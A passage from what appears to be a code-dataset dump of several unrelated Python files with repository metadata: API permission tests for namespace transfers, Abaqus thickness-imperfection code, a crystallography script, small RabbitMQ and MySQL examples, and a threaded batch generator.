                           data=json.dumps({"project_id": project2["project_id"]}))
    # user1 creates three namespaces inside project 1
    app.dependency_overrides[current_user] = lambda: user1
    namespace1.update({"project_id": project["project_id"]})
    response = client.post("namespaces/", data=json.dumps(namespace1))
    namespace2.update({"project_id": project["project_id"]})
    response = client.post("namespaces/", data=json.dumps(namespace2))
    namespace3.update({"project_id": project["project_id"]})
    response = client.post("namespaces/", data=json.dumps(namespace3))
    # transfer request: namespace1 from project 1 to project 2
    data = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project["project_id"],
            "new_project_id": project2["project_id"]}
    # unverified caller is rejected
    app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
    response = client.post('namespace2projecttransfer/', data=json.dumps(data))
    assert response.status_code == 401
    assert response.json()["detail"] == "User e-mail not verified"
    # non-admin caller is rejected
    app.dependency_overrides[current_user] = lambda: user2
    response = client.post('namespace2projecttransfer/', data=json.dumps(data))
    assert response.status_code == 401
    assert response.json()["detail"] == "Project for user not found or user not admin"
    # unknown target project is rejected
    app.dependency_overrides[current_user] = lambda: user1
    data_nonsense = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project["project_id"],
                     "new_project_id": str(uuid.uuid4())}
    response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
    assert response.status_code == 404
    assert response.json()["detail"] == "Target project not found"
    # unknown namespace is rejected
    data_nonsense = {"name": "nonsense", "region": namespace1["region"], "old_project_id": project["project_id"],
                     "new_project_id": project2["project_id"]}
    response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
    assert response.status_code == 404
    assert response.json()["detail"] == "Namespace not found"
    # namespace not belonging to the claimed source project is rejected
    data_nonsense = {"name": namespace1["name"], "region": namespace1["region"], "old_project_id": project2["project_id"],
                     "new_project_id": project["project_id"]}
    response = client.post('namespace2projecttransfer/', data=json.dumps(data_nonsense))
    assert response.status_code == 403
    assert response.json()["detail"] == "Namespace not associated to source project"
    # baseline DB state: 3 namespaces in project 1, no transfer candidates yet
    session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
    assert session.fetchone()[0] == 3
    session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
    assert session.fetchone()[0] == 0
    session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
    assert session.fetchone()[0] == 0
    session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
    assert session.fetchone()[0] == 0
    # valid transfer requests for namespace1 and namespace2 succeed
    response = client.post('namespace2projecttransfer/', data=json.dumps(data))
    assert response.status_code == 201
    assert response.json() == data
    data2 = {"name": namespace2["name"], "region": namespace2["region"], "old_project_id": project["project_id"],
             "new_project_id": project2["project_id"]}
    response = client.post('namespace2projecttransfer/', data=json.dumps(data2))
    # namespaces stay in project 1; two pending transfer candidates are recorded
    session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
    assert session.fetchone()[0] == 3
    session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
    assert session.fetchone()[0] == 2
    session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
    assert session.fetchone()[0] == 2
    session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
    assert session.fetchone()[0] == 0
    # without authentication the endpoint refuses the request
    app.dependency_overrides = {}
    response = client.post('namespace2projecttransfer/', data=json.dumps(data))
    assert response.status_code == 401
    assert response.json()["detail"] == "Not authenticated"
def test_transfer_candidate_accept(client: TestClient, session, monkeypatch):
monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
data3 = {"name": namespace3["name"], "region": namespace3["region"]}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data3))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user3
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "Project for user not found or user not admin"
role_bindings = rbac.list_namespaced_role_binding(namespace1["name"])
assert len(role_bindings.items) == 2
namespace1_e_mails = [item.subjects[0].name for item in role_bindings.items]
assert user1.email in namespace1_e_mails
assert user2.email in namespace1_e_mails
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 3
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
app.dependency_overrides[current_user] = lambda: user1
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 201
assert response.json() == {"name": namespace1["name"], "region": namespace1["region"],
"old_project_id": project["project_id"], "new_project_id": project2["project_id"]}
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
role_bindings = rbac.list_namespaced_role_binding(namespace1["name"])
assert len(role_bindings.items) == 2
namespace1_e_mails = [item.subjects[0].name for item in role_bindings.items]
assert user1.email in namespace1_e_mails
assert user3.email in namespace1_e_mails
app.dependency_overrides = {}
response = client.post('namespace2projecttransfer/accept', data=json.dumps(data1))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get_by_source_project(client: TestClient):
app.dependency_overrides[current_user] = lambda: user2.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user2
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 1
assert response.json()[0]["name"] == namespace2["name"]
assert response.json()[0]["region"] == namespace2["region"]
assert response.json()[0]["old_project_id"] == project["project_id"]
assert response.json()[0]["new_project_id"] == project2["project_id"]
app.dependency_overrides[current_user] = lambda: user1
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project3["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 0
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/by_source_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get_by_target_project(client: TestClient):
app.dependency_overrides[current_user] = lambda: user3.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user3
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project2["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 1
assert response.json()[0]["name"] == namespace2["name"]
assert response.json()[0]["region"] == namespace2["region"]
assert response.json()[0]["old_project_id"] == project["project_id"]
assert response.json()[0]["new_project_id"] == project2["project_id"]
app.dependency_overrides[current_user] = lambda: user1
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project3["project_id"]}))
assert response.status_code == 200
assert len(response.json()) == 0
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/by_target_project', data=json.dumps({"project_id": project["project_id"]}))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_get(client: TestClient):
data2 = {"name": namespace2["name"], "region": namespace2["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.get('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
app.dependency_overrides[current_user] = lambda: user3
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 404
assert response.json()["detail"] == "Project for user not found"
app.dependency_overrides[current_user] = lambda: user1
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
response = client.get('namespace2projecttransfer/', data=json.dumps(data1))
assert response.status_code == 403
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user2
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == {"name": namespace2["name"], "region": namespace2["region"],
"old_project_id": project["project_id"], "new_project_id": project2["project_id"]}
app.dependency_overrides = {}
response = client.get('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "Not authenticated"
def test_transfer_delete(client: TestClient, session, monkeypatch):
monkeypatch.setattr("app.api.routes.user_management.get_user_by_email", get_user_by_email)
monkeypatch.setattr("app.api.routes.user_management.get_user_by_id", get_user_by_id)
monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
data2 = {"name": namespace2["name"], "region": namespace2["region"]}
app.dependency_overrides[current_user] = lambda: user1.copy(update={"is_verified": False})
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "User e-mail not verified"
app.dependency_overrides[current_user] = lambda: user1
data_nonsense = {"name": "nonsense", "region": namespace1["region"]}
response = client.delete('namespace2projecttransfer/', data=json.dumps(data_nonsense))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace not found"
data1 = {"name": namespace1["name"], "region": namespace1["region"]}
response = client.delete('namespace2projecttransfer/', data=json.dumps(data1))
assert response.status_code == 404
assert response.json()["detail"] == "Namespace is not transfer candidate"
app.dependency_overrides[current_user] = lambda: user2
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 401
assert response.json()["detail"] == "Project for user not found or user not admin"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
app.dependency_overrides[current_user] = lambda: user1
response = client.put('project_user_management/admin_state',
data=json.dumps({"project_id": project2["project_id"], "user_id": user3.user_id, "is_admin": True}))
app.dependency_overrides[current_user] = lambda: user3
response = client.put('project_user_management/admin_state',
data=json.dumps({"project_id": project2["project_id"], "user_id": user1.user_id, "is_admin": False}))
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == "No records remaining"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
app.dependency_overrides[current_user] = lambda: user1
data2 = {"name": namespace2["name"], "region": namespace2["region"], "old_project_id": project["project_id"],
"new_project_id": project2["project_id"]}
response = client.post('namespace2projecttransfer/', data=json.dumps(data2))
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
response = client.delete('namespace2projecttransfer/', data=json.dumps(data2))
assert response.status_code == 200
assert response.json() == "No records remaining"
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 2
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE old_project_id='" + project["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespace2projecttransfer WHERE new_project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 0
session.execute("SELECT COUNT(*) FROM public.namespaces WHERE project_id='" + project2["project_id"] + "'")
assert session.fetchone()[0] == 1
response = client.delete('projects/', data=json.dumps({"project_id": project["project_id"]}))
app.dependency_overrides[current_user] = lambda: user3
response = client.delete('projects/', data=json.dumps({"project_id": project2["project_id"]}))
| 21,303 | 0 | 207 |
f03a8a84ca05fb06e5190a7a160fe0079e5c60e9 | 85 | py | Python | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 116 | 2018-02-23T19:47:15.000Z | 2022-02-21T04:43:46.000Z | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 224 | 2018-02-26T00:41:51.000Z | 2022-03-29T10:38:16.000Z | starry/_core/ops/limbdark/__init__.py | fbartolic/starry | d50576caf964ad925c490c9f3ffe1273ab155397 | [
"MIT"
] | 25 | 2018-02-26T18:14:36.000Z | 2021-11-30T01:00:56.000Z | # -*- coding: utf-8 -*-
from .limbdark import LimbDarkOp
from .get_cl import GetClOp
| 21.25 | 32 | 0.717647 | # -*- coding: utf-8 -*-
from .limbdark import LimbDarkOp
from .get_cl import GetClOp
| 0 | 0 | 0 |
22236c2ae2d83019f7983fe4b2e734a91069694e | 5,221 | py | Python | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/imperfections/ti.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | from __future__ import absolute_import
import numpy as np
from desicos.abaqus.apply_imperfections import change_thickness_ABAQUS
from desicos.conecylDB import update_imps
class TI(object):
"""Thickness Imperfection
Assumes that a percentage variation of the laminate thickness can be
represented by the same percentage veriation of each ply, i.e., each
ply thickness is varied in order to reflect a given measured thickness
imperfection field.
"""
def calc_amplitude(self):
"""Calculates the thickness imperfection amplitude
Amplitude measured as the biggest difference between each layup
thickness and the nominal thickness of the Cone/Cylinder,
considering only the layups that are not suppressed.
.. note:: Must be called from Abaqus.
Returns
-------
max_amp : float
Maximum absolute imperfection amplitude.
"""
if self.created:
from abaqus import mdb
cc = self.impconf.conecyl
part = mdb.models[cc.model_name].parts[cc.part_name_shell]
max_amp = 0.
cc_total_t = sum(cc.plyts)
for layup in part.compositeLayups.values():
if not layup.suppressed:
layup_t = sum(p.thickness for p in layup.plies.values())
max_amp = max(max_amp, abs(layup_t-cc_total_t))
return max_amp
def create(self, force=False):
"""Creates the thickness imperfection
The thickness imperfection is created assuming that each ply has
the same contribution to the measured laminate thickness. Thus, a
scaling factor is applied to the nominal thickness of each ply in
order to macth the measured imperfection field.
Parameters
----------
force : bool, optional
If ``True`` the thickness imperfection is applied even when it
is already created.
"""
if self.created:
if force:
cc = self.impconf.conecyl
cc.created = False
cc.rebuilt = False
cc.create_model()
else:
return
cc = self.impconf.conecyl
imps, imps_theta_z, t_measured, R_best_fit, H_measured = update_imps()
if self.use_theta_z_format:
imperfection_file_name = imps_theta_z[self.imp_thick]['ti']
else:
imperfection_file_name = imps[self.imp_thick]['ti']
H_measured = H_measured[self.imp_thick]
R_best_fit = R_best_fit[self.imp_thick]
t_measured = t_measured[self.imp_thick]
cc = self.impconf.conecyl
self.elems_t, self.t_set = change_thickness_ABAQUS(
imperfection_file_name = imperfection_file_name,
model_name = cc.model_name,
part_name = cc.part_name_shell,
t_model = sum(cc.plyts),
t_measured = t_measured,
H_model = cc.H,
H_measured = H_measured,
R_model = cc.rbot,
R_best_fit = R_best_fit,
number_of_sets = self.number_of_sets,
semi_angle = cc.alphadeg,
stretch_H = self.stretch_H,
scaling_factor = self.scaling_factor,
num_closest_points = self.ncp,
power_parameter = self.power_parameter,
elems_t = self.elems_t,
t_set = self.t_set,
use_theta_z_format = self.use_theta_z_format)
from desicos.abaqus.abaqus_functions import set_colors_ti
set_colors_ti(cc)
self.created = True
print('%s amplitude = %f' % (self.name, self.calc_amplitude()))
ffi = self.impconf.ffi
if ffi is not None and ffi.created:
# There is already a FFI, let it know about us
ffi.update_after_tis()
return self.elems_t, self.t_set
| 35.277027 | 78 | 0.581498 | from __future__ import absolute_import
import numpy as np
from desicos.abaqus.apply_imperfections import change_thickness_ABAQUS
from desicos.conecylDB import update_imps
class TI(object):
"""Thickness Imperfection
Assumes that a percentage variation of the laminate thickness can be
represented by the same percentage veriation of each ply, i.e., each
ply thickness is varied in order to reflect a given measured thickness
imperfection field.
"""
def __init__(self):
super(TI, self).__init__()
self.name = 'ti'
self.imp_thick = ''
self.number_of_sets = None
self.stretch_H = False
self.ncp = 5
self.power_parameter = 2
self.scaling_factor = 1.
self.thetadeg = 0.
self.thetadegs = []
self.pts = []
self.index = None
self.use_theta_z_format = False
# plotting options
self.xaxis = 'scaling_factor'
self.xaxis_label = 'Scaling factor'
self.elems_t = None
self.t_set = None
self.created = False
def rebuild(self):
self.name = 'TI_%02d_SF_%05d' % (self.index,
int(round(100*self.scaling_factor)))
self.thetadegs = [self.thetadeg]
self.pts = []
def __setstate__(self, attrs):
# Old versions had a bug where self.xaxis was set to 'amplitude'
# Fix that during loading
if attrs['xaxis'] == 'amplitude':
attrs['xaxis'] = 'scaling_factor'
attrs['xaxis_label'] = 'Scaling factor'
self.__dict__.update(attrs)
def calc_amplitude(self):
"""Calculates the thickness imperfection amplitude
Amplitude measured as the biggest difference between each layup
thickness and the nominal thickness of the Cone/Cylinder,
considering only the layups that are not suppressed.
.. note:: Must be called from Abaqus.
Returns
-------
max_amp : float
Maximum absolute imperfection amplitude.
"""
if self.created:
from abaqus import mdb
cc = self.impconf.conecyl
part = mdb.models[cc.model_name].parts[cc.part_name_shell]
max_amp = 0.
cc_total_t = sum(cc.plyts)
for layup in part.compositeLayups.values():
if not layup.suppressed:
layup_t = sum(p.thickness for p in layup.plies.values())
max_amp = max(max_amp, abs(layup_t-cc_total_t))
return max_amp
def create(self, force=False):
"""Creates the thickness imperfection
The thickness imperfection is created assuming that each ply has
the same contribution to the measured laminate thickness. Thus, a
scaling factor is applied to the nominal thickness of each ply in
order to macth the measured imperfection field.
Parameters
----------
force : bool, optional
If ``True`` the thickness imperfection is applied even when it
is already created.
"""
if self.created:
if force:
cc = self.impconf.conecyl
cc.created = False
cc.rebuilt = False
cc.create_model()
else:
return
cc = self.impconf.conecyl
imps, imps_theta_z, t_measured, R_best_fit, H_measured = update_imps()
if self.use_theta_z_format:
imperfection_file_name = imps_theta_z[self.imp_thick]['ti']
else:
imperfection_file_name = imps[self.imp_thick]['ti']
H_measured = H_measured[self.imp_thick]
R_best_fit = R_best_fit[self.imp_thick]
t_measured = t_measured[self.imp_thick]
cc = self.impconf.conecyl
self.elems_t, self.t_set = change_thickness_ABAQUS(
imperfection_file_name = imperfection_file_name,
model_name = cc.model_name,
part_name = cc.part_name_shell,
t_model = sum(cc.plyts),
t_measured = t_measured,
H_model = cc.H,
H_measured = H_measured,
R_model = cc.rbot,
R_best_fit = R_best_fit,
number_of_sets = self.number_of_sets,
semi_angle = cc.alphadeg,
stretch_H = self.stretch_H,
scaling_factor = self.scaling_factor,
num_closest_points = self.ncp,
power_parameter = self.power_parameter,
elems_t = self.elems_t,
t_set = self.t_set,
use_theta_z_format = self.use_theta_z_format)
from desicos.abaqus.abaqus_functions import set_colors_ti
set_colors_ti(cc)
self.created = True
print('%s amplitude = %f' % (self.name, self.calc_amplitude()))
ffi = self.impconf.ffi
if ffi is not None and ffi.created:
# There is already a FFI, let it know about us
ffi.update_after_tis()
return self.elems_t, self.t_set
| 1,041 | 0 | 80 |
7bd1fe7f42a3682cdb3288d310d99445d1adcff0 | 727 | py | Python | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | 1 | 2020-05-26T17:46:17.000Z | 2020-05-26T17:55:19.000Z | mmtbx/command_line/development.aev.py | mphancock/cctbx_project | ec8a239c5bcee9c9b2d1c6c95dc3fff2580bbb85 | [
"BSD-3-Clause-LBNL"
] | 1 | 2022-02-08T10:11:07.000Z | 2022-02-08T10:11:07.000Z | from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME mmtbx.development.aev
import sys
import time
import mmtbx
import iotbx.pdb
import mmtbx.model
from libtbx.utils import null_out
import mmtbx.atomic_environment_vectors as aev
if __name__ == '__main__':
main(*tuple(sys.argv[1:]))
| 26.925926 | 64 | 0.718019 | from __future__ import absolute_import, division, print_function
# LIBTBX_SET_DISPATCHER_NAME mmtbx.development.aev
import sys
import time
import mmtbx
import iotbx.pdb
import mmtbx.model
from libtbx.utils import null_out
import mmtbx.atomic_environment_vectors as aev
def main(filename, precision):
t0 = time.time()
pdb_inp = iotbx.pdb.input(file_name = filename)
model = mmtbx.model.manager(
model_input = pdb_inp,
build_grm = True,
log = null_out())
a = aev.AEV(model = model)
b = aev.compare(a)
print(b)
recs = aev.format_HELIX_records_from_AEV(b, float(precision))
print("\n".join(recs))
print('time', time.time()-t0)
if __name__ == '__main__':
main(*tuple(sys.argv[1:]))
| 378 | 0 | 23 |
a2463c67d96d75c3ab770a2e0bf79ca1214b2471 | 589 | py | Python | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | null | null | null | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | 3 | 2021-06-08T21:19:19.000Z | 2022-03-12T00:24:22.000Z | messageque/test-client.py | yafraorg/pythonsamples | 8f61292c89b497d4067d2fb1873e5281877901f3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import pika
#credentials = pika.PlainCredentials('guest', 'guest')
#parameters = pika.ConnectionParameters('amqp.k8sd.pax.ch', 80, '/', credentials)
#parameters = pika.URLParameters('amqp://guest:guest@localhost:5672/%2F')
#connection = pika.BlockingConnection(parameters)
connection = pika.BlockingConnection()
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World! MWN')
print(" [x] Sent 'Hello World! MWN'")
connection.close()
| 29.45 | 81 | 0.694397 | #!/usr/bin/env python
import pika
#credentials = pika.PlainCredentials('guest', 'guest')
#parameters = pika.ConnectionParameters('amqp.k8sd.pax.ch', 80, '/', credentials)
#parameters = pika.URLParameters('amqp://guest:guest@localhost:5672/%2F')
#connection = pika.BlockingConnection(parameters)
connection = pika.BlockingConnection()
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='',
routing_key='hello',
body='Hello World! MWN')
print(" [x] Sent 'Hello World! MWN'")
connection.close()
| 0 | 0 | 0 |
3629443222f0af2943cff48dbd1a24e656c4da71 | 648 | py | Python | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | advance/creat_table.py | naeimnb/pythonexersices | 94761d5a954c5f6a710baf4ea5f2be57f110c13e | [
"Apache-2.0"
] | null | null | null | import mysql.connector
from mysql.connector import errorcode
try:
con = mysql.connector.connect(user='niminimda', password='123456', host='127.0.01', database='test')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("something is wrong with user or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("db doesn't exists")
else:
print(err)
else:
my_function()
con.close()
| 25.92 | 104 | 0.683642 | import mysql.connector
from mysql.connector import errorcode
def my_function():
query = "CREATE TABLE employee (Name nvarchar(20), Weight int, Height int)"
cursor = con.cursor()
cursor.execute(query)
cursor.close()
try:
con = mysql.connector.connect(user='niminimda', password='123456', host='127.0.01', database='test')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("something is wrong with user or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("db doesn't exists")
else:
print(err)
else:
my_function()
con.close()
| 148 | 0 | 23 |
15551d605e398d1d5310dd0fd20056331d6f635a | 4,042 | py | Python | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | null | null | null | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | 8 | 2020-09-26T00:46:21.000Z | 2022-03-12T00:17:59.000Z | BatchThread.py | benblackcake/srgan_t1 | 5724df5aff8901f8044d65d8d46ee37b6e2e08cd | [
"MIT"
] | null | null | null |
import numpy as np
# A simple generator wrapper, not sure if it's good for anything at all.
# With basic python threading
import threading
# from threading import Thread
import multiprocessing as mp
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
# ... or use multiprocessing versions
# WARNING: use sentinel based on value, not identity
from multiprocessing import Process, Queue as MpQueue
from utils import *
class ThreadedGenerator(object):
"""
Generator that runs on a separate thread, returning values to calling
thread. Care must be taken that the iterator does not mutate any shared
variables referenced in the calling thread.
"""
| 32.079365 | 97 | 0.563582 |
import numpy as np
# A simple generator wrapper, not sure if it's good for anything at all.
# With basic python threading
import threading
# from threading import Thread
import multiprocessing as mp
import time
try:
from queue import Queue
except ImportError:
from Queue import Queue
# ... or use multiprocessing versions
# WARNING: use sentinel based on value, not identity
from multiprocessing import Process, Queue as MpQueue
from utils import *
class ThreadedGenerator(object):
"""
Generator that runs on a separate thread, returning values to calling
thread. Care must be taken that the iterator does not mutate any shared
variables referenced in the calling thread.
"""
def __init__(self, iterator_train,
# iterator_label,
batch_size,
queue_maxsize=1000,
random_crop=False,
Thread=threading.Thread,
Queue=Queue):
self.iterator_train = iterator_train
self.random_crop = random_crop
self.batch_size = batch_size
self._queue = Queue(maxsize=queue_maxsize)
#self._thread = mp.Process(target=self._run)
self._thread = Thread(
name=repr(iterator_train),
target=self._run
)
self.__iter_time = 0
#self._thread.daemon = daemon
def __repr__(self):
return 'ThreadedGenerator({!r})'.format(self.iterator_train)
def _run(self):
try:
# for value in self._iterator:
# self._queue.put(value)
batch_gen = self._gen_batches()
# loop over generator and put each batch into the queue
#print("__batch_gen_shape__%s"%batch_gen.shape)\
#print("__batch_gen")
#print(batch_gen)
for data in batch_gen:
self._queue.put(data, block=True)
#print("__queue__size__:%d "%(self._queue.qsize()))
# once the generator gets through all data issue the terminating command and close it
self._queue.put(None)
finally:
pass
# self._queue.put(self._sentinel)
def _gen_batches(self):
num_samples = len(self.iterator_train)
idx = np.random.permutation(num_samples)
batches = range(0, num_samples - self.batch_size + 1, self.batch_size)
print("_gen")
i=0
e_i =0
for batch in batches:
